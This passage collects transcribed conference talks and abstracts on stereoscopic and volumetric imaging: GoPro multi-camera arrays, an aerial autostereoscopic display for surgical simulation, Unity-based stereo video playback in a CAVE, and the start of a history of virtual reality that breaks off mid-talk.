The next talk is 3-way with back but not as we know it. So the author is Mr. Tim MacMillan. Yes. From GoPro. Thank you. Hi everybody, Tim MacMillan. So this is going to be a little bit different to what you've been looking at already. I'm from GoPro. Obviously, you know, I hope you know who GoPro is. We manufacture small but very high quality, very powerful, generally called sports cameras. And I joined GoPro four years ago. I don't know if they quite knew why they hired me but they put me in a department, which is the Department of One, which was me, called Multicamera. And what I was working on was ways of getting GoPro's to work in concert. So Multicamera means you don't use one camera, use two, four, six, twelve, ten, you know, any number. But there are certain things you have to do to make them work together. Because we understood that there is, there are new technologies coming which will require capture from multiple cameras, not just single monocular views but multiple views. And this includes everything from stereo to light field. So I'm going to talk a little bit about that. So, so I did a little bit of a historical context. I've been working in the multicamera field for 30 years building camera arrays. I just wanted to show that cameras have been around since before cinema, before video. This is Edward Mybridge back in the 1870s. And over there was a French photographer called Nadar who did what was called sculptural photography, which was basically, I think it was 12 or 24 cameras with synchronized exposures. So they could capture somebody sitting there and then use those photographs to create a sculpture. It would have to be carved by hand, but there we are. And jump to the present day. Here we are. And you see, we're still doing the same thing. We have the linear progressive arrays, like made famous by the matrix and stuff like that. And we have something new appearing now, which is a volumetric capture. And hang on to that right-hand image. I'll show you something in a bit. So what is volumetric capture? So yes, it could be one of many things at the moment. So this is an example of a 5 gigapixel volumetric capture. This is just a single frozen moment. The motion is actually the motion of the virtual camera. And what we have here is a volumetric capture and then creation of a virtual camera movement in Z-space in front of the camera array. So the cameras were all positioned away from the high jumper. But for the actual production shot, we're able to in Z-space move the camera in towards the subject to put the camera essentially where you could never put a camera. This is one of the amazing powers of camera array and computational imaging. So the technique we're using in this is basically photogrammetry, where we, and it's pure image based photogrammetry. We're not using any time of flight, laser, or any other kind of depth sensing. This is all done from computational imaging. And this capture, like I said, was 5 gigapixels. And you could have actually pushed the camera in further until you see the pores of her skin. There's that much detail in this. And every single strand of hair is clearly defined as well. But 50 gigapixels is a lot of data. And I'm sure this took several days to render. But this was the last Olympics, so a while back. So Z-space is easy to understand. You have a camera array, which could be doing photogrammetry, could be there for light field, could be there for like a matrix style thing. We just go frame by frame along. But because you've got the light rays coming into each camera, you can choose any position in front of there. And you'll have all the data from these cameras here. You'll have the data to create the image viewed from the Z-space camera. So this is quite a dense linear array, much denser than is practical in reality. The other thing to talk about is resolution threshold. Because as you move your camera in Z-space away from your array, you're going to lose resolution as well. But what we can do is use optical flow and some techniques of interpolation to actually bring the resolution back a bit. The downside of photogrammetry is that you have to render a 3D object and then refilm it. So it's a kind of two-step process to produce the image. And this works equally well for stereoscopic output. And in fact, about 10 years ago, the company... I'm with GoPro. I'm also CEO of Time Slice Films, which is a company that specializes in camera array. We actually did some work for some 3D stereo movies. One was Street Dance, I think. Kind of hip hop Street Dance movie. But we actually were able to generate very convincing Z-space camera in 3D stereo. Because as you change your convergence, you can just interpolate back... You project back onto your original array here and you can generate... You have all your data there to generate not only your position in Z, but also your convergence as well. So that was very exciting. But like I said, that's kind of old stuff. So that's an example of a linear array, maybe a moderately dense array. We have now emerging a new type. Obviously, you've seen a lot of interest recently in spherical cameras. A lot of companies are trying to produce spherical cameras to produce new virtual augmented reality. But there's issues with that. Not least of which is you immediately see how low your pixel density is going to be. You're having to cover a much wider field with fewer cameras. So there are issues there. So there's a lot of people kind of working on ideas for this. I thought I'd show this slide. This is a slide that Paul DeBevec at USC put up last year. We had a visual effects society light field conference. The first light field conference held at Paul's lab at USC. And Leitrow were there trying to plug their new rebirth as an augmented reality company. But Paul said, why use Leitrow sensors when you can just put a bunch of go-pros in a ball? It's much simpler and probably much cheaper as well. But he calculated that basically you need a shed load of cameras. I think in America they might say a shit ton of cameras to do this. Again, there is a resolution threshold here. For these algorithms to work, you have to have enough resolution. So this is a huge problem when it comes to capture. And then you have to encode that somehow. And then you have to share it. How do you share something like that? And then how do you view it? Well, how do you view it is partly your problem. But there's a lot of unanswered questions at the minute. So the thing is, where do we start with all this? And good old GoPro is actually quietly kind of tiptoeing into this field. So this is the Odyssey camera. This is a rig, an array, which GoPro is bringing out this year. We're actually releasing this this year. And this was in conjunction with GoPro's Jump project. So the Jump project is, are you familiar with Google Cardboard? It's a small viewer, a stereoscopic viewer for your phone. They want to put those in schools all over the world and create a library of content that school children can see. So someone in Africa can see what an iceberg looks like. And someone in Italy can see what it looks like in San Francisco and yada yada, you know, all that stuff. And they needed a rig to do that. And they figured they needed 16 cameras in a ring. But the interesting thing is, this is the first kind of computational imaging device, multi-camera computational imaging device that is actually going to be on the market and people out there using it. And I know that a lot of people are going to use this for other things than doing the Google Jump pictures. And the image this kicks out, you know, the image that Google produces for this is really quite huge. It's an 8K over under. I've written that equirectangular. It's not, I think, it's a square. It's an 8K by 8K square with two 4K by 8K windows of over under with the panoramic scene. So it's not a full sphere. It's a panorama. It's a 120 degrees vertical field of view. And what you do with this, you go out, you shoot stuff, you acquire the content on the cards, you upload it to the Google Cloud, the huge black box that is floating in the sky, that is Google's processing engine, and eventually they send you back your finished stereo 3D video. So that's what I'm calling the divergent array. So that's where we're working at the moment to produce content for divergent array. There's another type of array, again, which is beginning to appear, the convergent array. This gives us a very dense pixel map. This is interesting because this enables it to actually more easily create useful content using computational processes. It gives us the maximum chance of locating voxels. I'm sure you know what voxels are, they're pixels with volumetric pixels. This type of array is scalable. You could generate and create an array to do something on your tabletop, or it could encompass the whole stadium. You see various people. There was the iVision during the Super Bowl recently, where they had like a 30 cameras around the roof of the Super Bowl stadium, and they're able to do some sort of frozen time moves, camera moves around that. But obviously, the smaller the volume you're capturing, the higher the resolution you can capture at the course of this resolution issue to do with distance. We have a choice of outputs, light field, photogrammetric, optical flow. But actually, the photogrammetry pipelines are now beginning to come to maturity. This is a little test we did at Time Slice recently. I'm going to just come out of that and go into this so that I can show you this. Oops. A little bit difficult to... Oops, I've disappeared. Come back, come back. Let me just stop. Let me just go to another one. If in doubt, have a spare one. Here we are. All right. There's some weird lag going on with this. It's both laggy and hypersensitive. All right. So this is just 30 frames of me, but this is a volumetric image. We call it volumetric video. We can call it free viewpoint media, or we can call it 4D video. I mean, all those names are being sort of banded around at the moment. This is actually... This is going to go live on Facebook tomorrow, I believe. Let me just pause that and see if I can just get a little bit closer. Come on. That'll do. That'll do. All right. So this is... So the render engine for this is polygon-based. It's not a light field. It's not a point cloud. Although those types of engines are coming. The trouble there is that there are no capture pipelines or processing pipelines for light field yet, but CloudPoint will be coming quite soon. And now we're going to flip back to our talk. Please. Yes. Sometimes it just works. There we are. So the thing about volumetric capture... Volumetric capture is, I think, going to be crucial to the evolution of both still and moving image. And it fundamentally changes visual content creation from a fixed viewpoint to a free viewpoint. And this is going to have a lot of ramifications in terms of how people want to view images. And I guess this is... I'll get to this point at the end, but it's going to affect you guys a lot. Right. So... Okay. So how will this become mainstream? Here's a couple of screenshots from Microsoft's last PR video about HoloLens. And what they're showing is this 4D video, this free viewpoint content, the volumetric video. And they're kind of hedging their bets. In their PR stuff, they have both a screen that you could... With your HoloLens, you can put anywhere you like. And if the content allows it, that could be 3D stereo, or it could be 2D. Or the choice could be yours. Or if the content is this free viewpoint type content, then instead of watching a 2D or a 3D stereo display, you can watch a volumetric display. So you take your football match and you put it on your table and you watch it, as if you were in the audience. And nothing that, you can watch it as if you're in the audience or as if you're in the field with the players. You can have put your viewpoint anywhere you like. So there are other issues to do with this as well. I know this from the research we're doing with spherical cameras, is that there are huge problems to do with if you have a spherical view and you've got a HMD, and you're stuck in the nodal point of the sphere. So when you move your head, the whole world moves with you. This is very bad. It's very bad for your brain and your nausea and everything else. It causes huge issues. So people that are working in AR and VR and everything else desperately need some volumetric ability to move within a volume. And hence, Lightfield now beginning to appear as a capture process. And there's another more important reason why image capture will have depth information, which is that it's not just about looking at it, it's not just about consuming it. It's also the fact that depth information will be incredibly useful and maybe the primary driver for depth information in imaging. Because the depth information can be used in Google's 3D map of the world in Streetview. And if you're looking at kind of second screen content, you can use the depth information from cameras within the stadium at the time to generate the 3D model of the stadium. So I would say that we're replacing cinematic language of vicarious experience with a first person view. I'd ask you guys to think about, will people really want to look at stereo 3D monitors if you can look at it as a volume? I look at the history of 3D and I see this, it's been hampered by the constraints of the monitor. And there's been a lot of research into why the stereo 3D market crashed in the consumer space. It still lives on in the cinema space. But here we've got capture coming with the power to give you a 3D, a volumetric object, a video object, which maybe, I'm not saying it will be, I'm saying it's a good chance that may be actually more compelling than a 3D monitor. But people haven't learned how to work with this content yet. You see the attempts people have to take a spherical camera, put it in a concert and expect it to be immersive. It's not immersive. I'm sitting there looking around. I can't move my head. My head's fixed and I can't move around. When people are able to move around within the concert and experience it for themselves, their own kind of exploration of that environment, then it will be interesting. So it's going to change from something which is preordained. This is a screen. It's edited. This is what you're going to see. We're going to lead you on a journey to a journey which is self-generated. But the good news is that in terms of 3D monitors, the content will hopefully be inherently 3D. You'll be able to present it as 3D stereo or light field or point cloud, whatever you like. Okay. That's it. I'll end with 16 is the magic number. Any idea why 16 is the magic number? What can you do with 16 cameras other than a circle? Any ideas? Like 2 by 8 or 4 by 4. There are many other configurations you can put these cameras in. So people have been very interested in this array because they can reconfigure it to start experimenting with light field arrays and stuff like that. So that's it. Thank you. Okay. Thank you. Thank you. Thank you.
|
GoPro launched the “DualHero 2.0” stereo rig in 2014. This offered amazing sync ability (pixel level), low cost and high resolution (17:9 2.7K@30p which looks amazing when viewed on a 4K 3D monitor). But the consumer stereo 3D market had already crashed. 3D continues to be a strong attraction at the cinema because the viewing experience is carefully controlled. This same challenge is now plainly visible in the emerging VR, AR and MR technologies, but there are really compelling reasons why 3D, either as stereo output or depthmap will play an essential role in the coming video technologies. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32231 (DOI)
|
So I'm Hidekake from the University of Tsukuba, and this is a joint work with my student, Shute Ishizuka. So the title of my talk is High Resolution Area 3D Display Using a Directional Backlight. So the contents is like this. First, I'm going to talk about the background of this research. So I'm working with medical doctors, surgeons, and of course 3D. Medicine is one of the promising areas for application of 3D. And the highest priority for medical doctors for 3D or the imaging is resolution. So high resolution is the highest priority. But another, well, merit of 3D for medical purpose is direct manipulation style. What is direct manipulation is, you know, for example, when we think of surgery simulator, here's part of the brain or any part of the body. And for surgery simulation or rehearsal, the operator can touch and manipulate, as if he's touching with his hand directly. So this is direct manipulation. So this kind of style is very good for training or rehearsal of surgery. So to do that, one option is 3D aerial display. So this is the work. Oops. Can I play the video? Okay. Thank you. So this is our work about 16 years ago. So the image is floating here. Oh, sorry. And I presented this system in SeaGraph 2000. It's about 16 years ago. And how it works is like this. So here's a pair of lenses. And with the lenses, the real image of this screen is generated in here. So when the viewer looks at the image, it's floating. So the eye's focus is fixed here. So it's very easy to recognize something is in here. And only with that configuration, just a plane is floating. So to show depth, we have to do a certain amount of parallax, binomial parallax, to do that. So actually we can do that without forcing the viewer to wear glasses. Because of the lenses, the light rays impinging on the right eye once gathers here. And the light impinging on the left eye once gathers here. So if we place a filter here, for example, in the system we constructed 16 years ago, we showed images with two different polarization on the screen. And we set a pair of polarization filters with two different polarization. Then the image, two different images can be shown to the left eye and the right eye. Of course, when the viewer's position changes, these points also change. So we have to track the position of the viewer. And by moving the filter in accordance with the viewer's position, then we can keep on showing two different images to the right eye and the left eye of the viewer. And to show the right image to the right eye and the left eye, for example, to show a triangle here and make it stable, we calculate the optical rays like this. So to show point A in the air, we prolong the line segment between the eye and point A and calculate the refraction of the lens. And we show the pixel of A here on the screen. And we do the same thing for the left eye here. And we do that for all the pixels. And of course, this calculation changes when the viewer's position changes. So we can keep on tracking the viewer's position and we can keep on calculating to show the stable image in the air. And of course, the lens includes aberration or distortion. So on the screen, we show the image distorted in the reverse direction like this. Then from the viewer's position, the right cubic can be observed. Of course, this way of distortion changes when the viewer's position changes. So when the viewer moves sideways, then we show the image like this on the screen. And from the viewer's position, the right image can be observed like this. So the problem of this system, actually, I made the first system 16 years ago, but it was not commercialized. So the main problem is the physical motion of the filter. For demonstration, it's okay, but for practical use, it's not very good to present a system with a physical motion. And there have been some solutions to do away with the physical motion filters. One is to use electronic filters. And actually, I also made a kind of prototype system. But with only one layer of electronic filter, we can move in the horizontal direction or in the vertical direction, but we can't move in the depth direction. If we place multiple layers of filters, then the viewer can move forward and backward. But if we place multiple shutters, then the image becomes very dark. So it's not practical. So to solve this problem, we use directional backlight in place of mobile filters or electronic filters. So this is the Notosruss-Sorg display using directional backlight. Actually, we presented the system based on these optics last year in this conference. So in this system, these are the lenses. And we keep the distance between the backlight and the lens the same as the focal length of the elemental lenses. Then the light is collimated so we can realize directional backlight to the right eye and to the left eye. So here to show the image only to the right eye, here we show the right eye image. And we just extend the line from the eye to the center of the elemental lenses and we make these parts bright for this person and make these parts bright for this person. And then both of the viewers can see the image here only with the right eye and not from the left eye. And for the left eye, we make these parts bright. So this is also connecting the eye and the center of the lens. And then only from the left eye, the left eye image can be observed. So by alternating between these two modes, we can achieve time division multiplexed auto-Australia display. But not only with this configuration, the image observed is like this. Because we are using lens array, the seam of the lens is quite distinct and annoying. And also we are enlarging the backlight pixels. So there are lots of artifacts because the pixel structure is magnified with the lenses. So to make it practical, we use lens array like this. So the height of the elemental lens is very short and the phase of each row is different. So the bright part of the lens is different in each row. And with this lens and also we combine a vertical diffuser, then the bright part and dark part are averaged. And the image shown becomes quite uniform. And because this is a vertical diffuser, it does not disturb the directionality of light to the right and the left eye. Because basically the right and the left are parallel to the ground. So this is the image observed. So it's quite good and practical. And last year we demonstrated the system, but at that time the image was quite dark. So not very good. But we replaced the backlight with the brighter one and now it's much better. And here we are using it for liver surgery simulator. As I said, we are working with surgeons of University of Tsukuba hospitals. And this is the cancer and blood vessels are running. So it's similar and it's already used. So actually this is a scene of training of medical students in University of Tsukuba hospital. So back to the presentation's main story. We combined these two ideas to make a high resolution floating area display without moving parts. So this is the actual system we made. So this part is the aerial display we made 16 years ago. This part is the directional backlight which we used in the last year's presentation. So here and here the light to the left and the right eye gathers. And we realized directional backlight to gather light here and here. So when these parts, of course, when the viewer changes, the depth of these gathering points have to be shifted. We can achieve that by changing the interval of the bright parts. So these points can be moved backwards and forward by changing the interval of the bright parts. So the viewer can move forward and backward. So this is the actual system we made from the front. So this is a large lens to generate a real image in the air. And this is the backlight part. So this is the backlight. So lenses and the diffusers and so on. So this is the specification of the prototype system. So the scale is like this. Not very large, but we're using a 27, 24 inch LCD panel. So this is the observed image. So we took these pictures with the Fujifilm camera, 3D camera. And so this is the left eye view and the right eye view. And we attached a position sensor to the camera. With that configuration, we can realize motion paths also. So again, the video, would you click the slide please? Oops. Oh, it's not working. No. Okay, so actually the video is not working, but no. Actually the video is the video of this scene. Okay. And discussion. Actually, I just talked about the kind of realistic situation, but in actual optics, the lens includes aberration. So to show a large image, we actually because of the aberration, the backlight for the left eye and the right eye overlaps like this. To avoid this phenomenon, one effective way is a very simple way, is to narrow the aperture of the elemental lens to decrease the blur. And another point is that if we use the lens with large focal length here, then the aberration becomes smaller. So we can show a very large image without crosstalk. It's just a simulation based. We haven't made this system. But theoretically, we can enlarge the area of a little crosstalk. So conclusion. Our full HD area, 3D image is printed without moving parts by using a direction backlight. And to show a large image, we have crosstalk, as I said, small elemental lenses, and use of convex lens with larger focal length is effective. Thank you.
|
This paper describes a high resolution aerial 3D display using a time-division multiplexing directional backlight. In this system an aerial real image is generated with a pair of large convex lenses. The directional backlight is controlled based on the detected face position so that binocular stereoscopy may be maintained for a moving observer. By use of the directional backlight, the proposed system attains autostereoscopy without any moving parts. A wide viewing zone is realized by placing a large aperture convex lens between the backlight and the LCD panel. With the advantage of time-division multiplexing, a high resolution 3D image is presented to the viewer. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32233 (DOI)
|
Our first paper is an efficient approach to playback a stereoscopic video using a wide field of view. And we have two speakers. Professor John Lediza is associate professor of biomedical engineering at Marquette University where he directs the visualization laboratory also known as Marvel. Chris Larky is the visualization technology specialist for Marquette. His work combines a background in video production, motion graphics, broadcast engineering, and graphics programming. Gentlemen. Thank you very much for the opportunity on behalf of Chris and myself for the opportunity to present our work with you here today. So the backdrop for what we're discussing here is our large scale, a merciless environment and several other stereoscopic or active 3D displays that we have as part of the Marquette visualization lab or what we refer to as Marvel. So Marvel really contains these resources dedicated to not only research and teaching but also industry and outreach initiatives. We have the large scale, a merciless environment that you see here. This is a sort of a slightly different twist on the traditional cave. So this is an extra wide four sided cave. So it's about 20 feet wide, 10 feet tall, and 10 feet deep. And that was dictated by the end users that came forward during the planning portion of putting this cave together. Everything is back projected except for the floor. So we've got four projectors across the front. You'll see the specs on those in just a minute. Two per side and then two for the floor. We also have adjacent to this what we call the CDL or the content development launch where the content that you'll see today is created. We have the ability to test the content there before we move it into the cave. And then down on the right we have a hall screen or another 3D, active 3D display system that we can also use outside of the CDL. We opened about two years ago and over the course of that period we've provided academic experiences so at least hour long experiences for roughly a thousand students from 24 different classes and intend to different disciplines across campus. So we're a lot of things to a lot of people. If we look at all comers to the lab over the last two years we estimate that we've had about over 4,000, maybe close to 5,000 people through the lab. The other thing that's not presented here is the work that we're doing with head mounted systems, headsets, gear VR, Oculus Rift. We really use those purely as ways of showing our content in a portable manner. So when people want to collaborate with us but they can't always get to the cave we'll use this as a way of delivering that content. Here's some specs of our Marvel large scale environment. We've got 10 Christie projectors. You can see the specs there. Again, four on the front wall, two per side and two on the floor. This is run by six HP workstations. Again, you can see the specs of those up on the screen. So those are some constraints for us. We have a cluster based system and they figured into our objective here on the screen today. Our end user applications as well, they required a couple things. One was the ability not only to display the content but also interact within it. And most of the content we'll be talking about today is forward motion video that we obtained at a constant rate. Our 4K resolution is our front wall and our cave and we've got about 7K overall if you consider the sides as well. We have high frame rates that we need to deal with as well. So this set the context for our application. That is to develop an approach to playback of stereoscopic videos in a 3D world where we have the depth actually determined by the content. Okay. So all of our programs that we've been making in the cave over the past two years have all really been using the Unity game engine. So our traditional workflow is to build a virtual environment using things like 3D meshes, polygons, lights and use that type of rendering workflow. But so to do something that's completely video based but still keep it inside Unity was actually something that's a bit of an unusual combination. And we managed to do a couple of tricks that we figured out that I like to share with you. So the workflow to creating a video player inside Unity is actually not terribly unusual. We're making two cameras and two screens and basically configuring it so only the left camera can see the left screen and the right camera can see the right screen. But in order to actually pull it off and run it on a cluster on a 7K projection display all in sync, there were some challenges that went into that. So another reason we kind of had to customize the player is because our content was very highly customized. So this is just a sample frame of the kind of things that our students were producing. This was captured using a 6 GoPro camera rig using a camera rig that they 3D printed and designed themselves. So it's not your typical spherical stereo rig. This is actually a cylindrically projected panorama that only covers about 270 degrees horizontally. So the reason it's not completely spherical is because that field of view really kind of matches what you see in the cave typically because caves have an open back and things like that. So that's stereoscopic with left on the top and right on the bottom. So to start off we had to create a custom screen and the tool of choice that I used here was Blender which was really what we used to make a lot of our programs. But the modeling for this scene was just really make a custom screen. And for this one you're going to need your 3D glasses to see a sample of the kind of screen that we created. So it's really just a sphere that has a portion of it cut off. The top and the bottom are cut off and then it's open in the back. Now this is just one version that we've done. We've also done other versions that where we've matched, we've mirrored completely the physical models of the cave for a more precise alignment but this one is a cylinder basically. Also equally important is the UV mapping on this which we tuned quite a bit to make sure it matches the custom rig, the custom contact. So this is a view, sort of a simulated version of what you see in a headset. Now this isn't completely accurate because it's not a direct capture because what this is is really just a cropped version of the spherical panorama that I showed you earlier. The proper version would be projected onto the sphere so the aspect ratio would be a little bit more correct. And also because this was the students first attempt there's also some various issues, most notably the frame line at the top and the bottom. Most of that is outside of the field of view when you're viewing it inside the cave so it's not quite as flickery as you see it here. And this is a screenshot of the arrangement in Unity so as you can see my hierarchy is really quite simple. I have two cameras and two screens. The screens you see are mirror copies of the same object that just are using Unity's tagging system to specify whether it will be visible in the left eye or the right eye only. But what I'd also like to point out is some detail I have on the right side because that part is rather important to making this work in a high performance way. Starting from the bottom there, the movie script is a custom script that I wrote that does various things like user inputs to play and pause the video and also maintains some cluster synchronization code in there. But above that is the main video decoder. Now one of the main keys that makes this work is that we're taking in the video frame once, decoding it once, and then copying the texture data onto two separate objects. We use that by having the apparent object in the movie hierarchy which then, and then the two screens below that. Most other documentation would have the movie player and the texture updater component on the same object. But that didn't work for us because then you're decoding and moving the video texture through memory twice which is really problematic when you're dealing with 4K footage. So to summarize that, two copies of the object, they're on separate layers, labeled left and right only. And there's a couple other things that I think are also nice about this program. One of them is that in order to make the program a completely reusable video player, I did write some additional features to have it read the locations of the video files from an external file which can be edited without having to recompile the program. And the other thing is even though we're inside Unity, we're using an unlit shader just to get the video texture directly on screen without having to compute lights or shadows or anything like that. So that's for performance although we do have enough performance to spare on our system that we can do some hybrid stuff. The camera masks are a little bit unusual because the ability to have objects flagged per eye is actually something that only was added recently, starting with Unity 5.1 which really started to focus on VR extensively. So for the Unity 5.1 and onwards, we're using a part of the predefined Oculus prefab object for our camera rig. But we did have this working on Unity 4 using some steps I'll show you in a moment. So in order to run Unity on a cave, there's a number of additional pieces that are required. The one that we use is called middle VR and this handles things like the infrared tracking system, the clustering, the off-center camera projections and various inputs like that, cluster management, all the things that are missing in the default build of Unity. So the thing about middle VR is that the camera rig is loaded from a configuration file that's built at runtime. So we have to set everything up through script. So I've included a little piece of code here just because the ability to uncheck things inside a menu is not something that's really well documented in my opinion. So you actually have to deconstruct an object in there. Now one of the things that I think was also really beneficial that we kind of discovered the hard way was that the traditional default camera setups have obviously for stereoscopic you have camera separation. But that was actually producing a conflict for us because we were getting too much stereo because that worked for our first attempts with video where we had the video on a small surface where it was inserted into the scene and playing only a portion of your field of view. But if the movie plane is the entire scene and wrapping around you, then when the camera rotates, there's just the stereo is incorrect. So what we've done here is that we have a specific configuration where the camera separation, the eye separation for the two cameras is set to zero because the movie file itself already has the cameras pushed apart. So in order to make them conflicting or not exaggerated, we actually have a simplified approach for that. So this is also kind of also another early attempt that didn't work was trying to inject the two objects directly into the quad buffering rendering pipeline, but that was pretty unreliable. So this is kind of an example of the kind of content that we've been showing with using combination of photos or videos in our cave. I'll hand it over back to John to describe what we're looking at here. This is probably our most commonly used application currently. So this is what we started as an immersive fitness program through the lab. And we bring this up to show a couple of different things. On the left, you can see an implementation that we did locally following some success in Marvel. On the top right with your 3D glasses, you can see in this particular case, we're moving through a forward motion video or a still of at least moving through forward motion video. But on the right, as an application of the custom UV mapping that Chris was talking about, on either side of the screen, actually, there's some distortion that's been implemented to give the rider a sense that they're moving through the space at an increased rate. In contrast, on the lower left, for the immersive yoga program that we're running, that's just simply wrapped around the full available 7K resolution. And again, this has been something that was a challenge to work through and led to the developments that Chris has talked about, but has also been hugely popular at our system here. Also, these applications are a really good demonstration of why we're doing it in Unity at all instead of just a dedicated video player. Because as you can see on those screens here, we're not just playing a video. We try to bring a lot of interactivity to them. So by doing it in a flexible game engine, we can have live overlays, integrating live data. We can have do a lot more interactive things with our audio, including spatially positioned audio. We can have custom timers or modify the playback rate, which is something that's very useful for these workout videos. We have another student working on a system where we use a Bluetooth sensor on the bicycle to control the playback rate of the video. And basically, there's a lot of other clips. Another one that we've done that's not pictured here is a basketball simulator where we can test the reaction time of a person's ability to predict the direction that a player is going to move, either to the left or to the right. So these applications are kind of being used for other, to conduct other experiments and other experiences. The other one we wanted to feature here, and this feeds nicely into the portable version, our head mounted devices, is an architectural pre-visualization. And we also have a historical realization program. This is part of an ambitious program by the university, over a $100 million project to try and raise money for a research center. So we begin bringing stakeholders into this space and helping them to appreciate what it would look like. And again, taking advantage of a lot of the advancements that Chris has made. Here again, you see a crop from a spherical panorama rather than what you would see in the head mounted display. And so this is using the same technique that, because it's a pre-rendered 3D render, this actually took several hours to render on a machine. But because it's all pre-rendered, we can render that, take that rendered image and run it on mobile. So this is the same technique, the same stereo setup, but running on a gear VR headset instead of running in a full cave. So another missing piece in this to really achieve high performance video playback inside Unity is this third party plugin called AV Windows Media. Unity does have some capability of doing movie textures built in, but it really doesn't have the level of performance that we require to have full screen resolutions at 1080p or above. So a lot of the stuff we run is 4K, which really requires a GPU accelerated decoder. So that's really what AV Windows Media Pro does. However, that doesn't really solve all of our problems because there's still some finesse required in order to get a proper playback, a smooth playback rate from that. So part of the reason was, well, these are just some of the features of AV Windows Media Pro that we liked because I think I probably covered that earlier. So getting the video format in a way that we preferred was actually really quite challenging. One of the tips that I would have for you is to use the Xvid codec. Xvid is actually a pretty ancient media codec compared to others. It's a predecessor to H.264, and the simplicity of it is actually its strength for doing this type of playback because it's so simple it can decode 4K resolutions very quickly, even though it's never really designed for 4K. And because it's not efficient, it actually requires a very high bit rate of around 80 to 90 megabits per second. But that did actually allow us to achieve the frame rate that we needed, whereas with H.264 or H.265, the bit rates were lower, but it still started to keep in sync along the cluster. Thank you.
|
The affordability of head-mounted displays and high-resolution cameras has prompted the need for efficient playback of stereoscopic videos using a wide field-of-view (FOV). The MARquette Visualization Lab (MARVL) focuses on the display of stereoscopic content that has been filmed or computer-generated using a large-scale immersive visualization system, as well as head-mounted and augmented reality devices. Traditional approaches to video playback using a plane fall short with larger immersive FOVs. We developed an approach to playback of stereoscopic videos in a 3D world where depth is determined by the video content. Objects in the 3D world receive the same video texture but computational efficiency is derived using UV texture offsets as opposing halves of a frame-packed 3D video. Left and right cameras are configured in Unity via pulling masks so that they only uniquely show the texture for the corresponding eye. The camera configuration is then constructed through code at runtime using MiddleVR for Unity 4, and natively in Unity 5. This approach becomes more difficult with multiple cameras and maintaining stereo alignment for the full FOV, but has been used successfully in MARVL for applications including employee wellness initiatives, interactivity with high-performance computing results, and navigation within the physical world. © 2016, Society for Imaging Science and Technology (IS&T).
|
10.5446/32235 (DOI)
|
Okay, so our next speaker is Carolina Cruz-Nira, and she's going to be speaking about Beyond Fun and Games VR as a tool of the trade. Carolina is a pioneer in the areas of virtual reality and interactive visualization, having created and deployed a variety of technologies that have become standard tools in industry, government, and academia. She is well known worldwide for being the creator of the cave virtual reality system and her PhD work and for VR jugular. All right, I'm ready to go. Well, good afternoon, everybody. I'm actually going to take a little bit of flexibility here because my talk was actually a guest talk. So as a guest speaker, I have a little bit more freedom to talk more in general. And I also thought because it was the last talk of the day, it would be a nice way to hopefully bring together all the exciting things that we have heard throughout the year. So I'm going to start my talk with a very simple statement. As I've been going around talking in the last couple of years, we are starting to sort of lean in the direction that when we talk about virtual reality, we immediately think head mounted displays. In a lot of cases, that's the case, that's the situation. So when I give all my talks, this is always my first slide these days. Okay? There's a lot more to virtual reality than just head mounted displays. To me, virtual reality is whatever kind of technology that puts you there. And there can be pretty much anything. It can be the coolest game in the planet, but also it could be the inside of a human body. It can be an engineering design. Or it can be a travel to time through time to understand history events. So with that in mind, I'm going to spend the next five minutes taking us back in history. So this is why I put it here for you because this is how we were over 20 years ago. If you look at this picture, just remember this picture a little bit later because a lot of this sounds very familiar from what we have today. My place doesn't show up. We have Jaron Lanier with the VPL iPhone. We had the virtual reality guys. A bunch of other exciting things. And that was 20 years ago. And it seems sometimes that there's no memory in our community that we've been doing this for a long, long, long time. However, for me, I came into this world at that time in 1991. And my first experience, like probably most people today, first experience in virtual reality, was with a head mounted display. I was a very young graduate student at the time. And like everybody else, the mom and I put it on. What did I do? Whoa! Which you still hear a lot of people that have that try on Oculus Rift for the first time. Vibes, Gear VR, whatever. It's all like, whoa! This is super cool. But then, after I did that, because of course I was a PhD student on the hunting for a PhD thesis, I had to take a step back. And I started reflecting on what is exactly this thing doing for me. So the first thing that it did for me, I have to say as a disclaimer, I'm originally from Spain. So I'm very social. I like to be with my friends. I like to be with my people. I like to be with my 300 cousins and all that kind of thing. So when I go into virtual reality, the first thing that happens is I lost my friends. I lost my own body. I lost my environment. And I'm totally somewhat else that I don't have my usual frame of reference, which is, for example, my peripheral vision, where I see my hands, where I see my banks, where maybe I see the tip of my shoes. So to me, that was very annoying, again, after I went through the guao stages. Of course, perhaps because I'm a girl. You know, this whole thing on my head was just too much of stuff on me. I had things on my head. I have cables. I had things that kind of sucked into my face, created wrinkles, which I don't want wrinkles, you know, all that kind of thing. So it was really cumbersome. As much as I tried really, really hard, and again, I'm talking 1991, I cannot imagine a group of people sitting together with multiple headmounds that is placed on to share experience. And again, yeah, we're doing collaborative VR and all that kind of thing, of course. I still don't see that. Here is my typical scenario. Mom, dad, the kids, and grandma just finished dinner, and now we're going to watch the movie after dinner. I just don't see that as scenario with five HMDs in the living room, you know, and maybe I'm just sort of the weirdo of the virtual environments community. I just don't see that happening. I see scenarios where this technology, of course, is really helpful and very good, but there are some other scenarios that I think we're trying to force into the technology versus force the scenario drive, the technology. And then another thing that I noticed in 1991, which to me is still very familiar to what we do today, is really a lot, a lot of emphasis and focus on the entertainment value of this technology, and there is not much information to the public. Again, in community like ours, of course, we know, but to the public that this is way, way, way bigger than gaming and 3D movies. So, and then since I come from the background of computer engineering, of course, you know, we had the fact that we don't have, again, talking 1991, a very common infrastructure to develop applications. If you look at this, a lot of these points are still valid today. I mean, we have things like the Unity game engine that a lot of people are using through tools like middle of VR and tech v's and some other things, but still it's very difficult sometimes to move from platform to platform your applications. You cannot run something that runs in this particular application easily ported to a different technology. So, you know, we have the issue of simplicity as well, you know, how simple is simple and how complex is complex, you know. Nowadays, things are a lot simpler, you know, we have devices that you get your smartphone, your smartphone, you slap it in the device and you have a fairly amazing virtual reality device. Of course, we didn't have that back in the 90s. So, from all these in the 90s, this was what drove me to accept the offer from the electronic visualization lab to do my PhD in virtual reality. And then, you know, basically say, you know, I really need to figure out something to do that goes beyond this observation. So, I guess as part of my PhD research, you know, we developed the other VR, you know, that other thing out there, which basically was, well, let's build a physical space that is big enough that we can all bring ourselves into the virtual space and bring our friends with us into the virtual space, but still be there, that mysterious there that we want to be. So, that was the origin of the cave. I put you some historical pictures in here, you know, back in 1992 when the cave was shown for first time at SIGGRAPH, you can see people, people waited in line for five, six hours dancing in the audience, he remembers that as well. There was a lot of people because it really opened a lot of 